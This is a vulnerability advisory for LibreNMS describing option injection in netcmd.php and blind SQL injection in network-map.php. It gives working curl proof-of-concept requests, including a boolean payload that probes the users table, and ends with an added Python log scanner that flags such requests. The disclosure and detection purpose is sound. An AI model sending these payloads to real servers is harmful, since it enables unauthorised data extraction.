These vulnerabilities were discovered by Eldar "Wireghoul" Marcussen
LibreNMS, a fully featured network monitoring system that provides a wealth of features and device support. -- http://www.librenms.org/
LibreNMS used a flawed regular expression to filter input passed to commands. This allowed an attacker to specify command-line options, which can lead to information disclosure. The following examples could be used to check the version numbers of the binaries.
curl 'https://host/netcmd.php?query=--version&cmd=tracert'
curl 'https://host/netcmd.php?query=--version&cmd=whois'
curl 'https://host/netcmd.php?query=--version&cmd=ping'
The network map script suffers from a blind SQL injection vulnerability that yields a binary condition which can be used to extract data. The following two example URLs both show successful attacks:
curl 'https://host/network-map.php?format=svg&device=34+and+1=1'
curl 'https://host/network-map.php?format=svg&device=34+and+(select+count(username)+from+users)=5'
Versions 77e76793c518e504ceacd0cee2157f4260203fce and older
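To check web server logs for requests matching both issues described above, the following added example (not part of the original advisory or of LibreNMS) flags netcmd.php requests whose query is not a plain host and network-map.php requests whose device is not an integer. The function names, the combined-log-style input format, the sample lines, and the assumption that device is a numeric ID are all constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME = re.compile(rf"(?=.{{1,253}}\Z){LABEL}(?:\.{LABEL})*\Z", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def is_host(value):
    """True for a plain IP address or hostname (what ping/whois expect)."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME.match(value) is not None

def check_request(url):
    """Return a finding for a suspicious request URL, or None."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    if parts.path.endswith("/netcmd.php"):
        for q in params.get("query", []):
            if q.startswith("-"):
                return "netcmd.php: query is a command-line option"
            if not is_host(q):
                return "netcmd.php: query is not an IP address or hostname"
    elif parts.path.endswith("/network-map.php"):
        for d in params.get("device", []):
            # Assumption: device is a numeric ID, as in the page's device=34.
            if d and not re.fullmatch(r"[0-9]+", d):
                return "network-map.php: device is not a plain integer"

def scan(lines):
    """Return (line number, finding) for each flagged access-log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m and (finding := check_request(m.group(1))):
            hits.append((n, finding))
    return hits

# Constructed sample lines, not taken from a real server.
FMT = '192.0.2.10 - - [01/Jan/2016:10:00:00 +0000] "GET {} HTTP/1.1" 200 512'
SAMPLE_LOG = [FMT.format(u) for u in (
    "/netcmd.php?query=192.0.2.1&cmd=ping",
    "/netcmd.php?query=--version&cmd=whois",
    "/network-map.php?format=svg&device=34",
    "/network-map.php?format=svg&device=34+and+1=1")]
if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The same two checks (reject a leading "-" and anything that is not an IP address or hostname; accept only digits for device) are the server-side validation these parameters need before they reach a command line or a query.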
Posted by Eldar Marcussen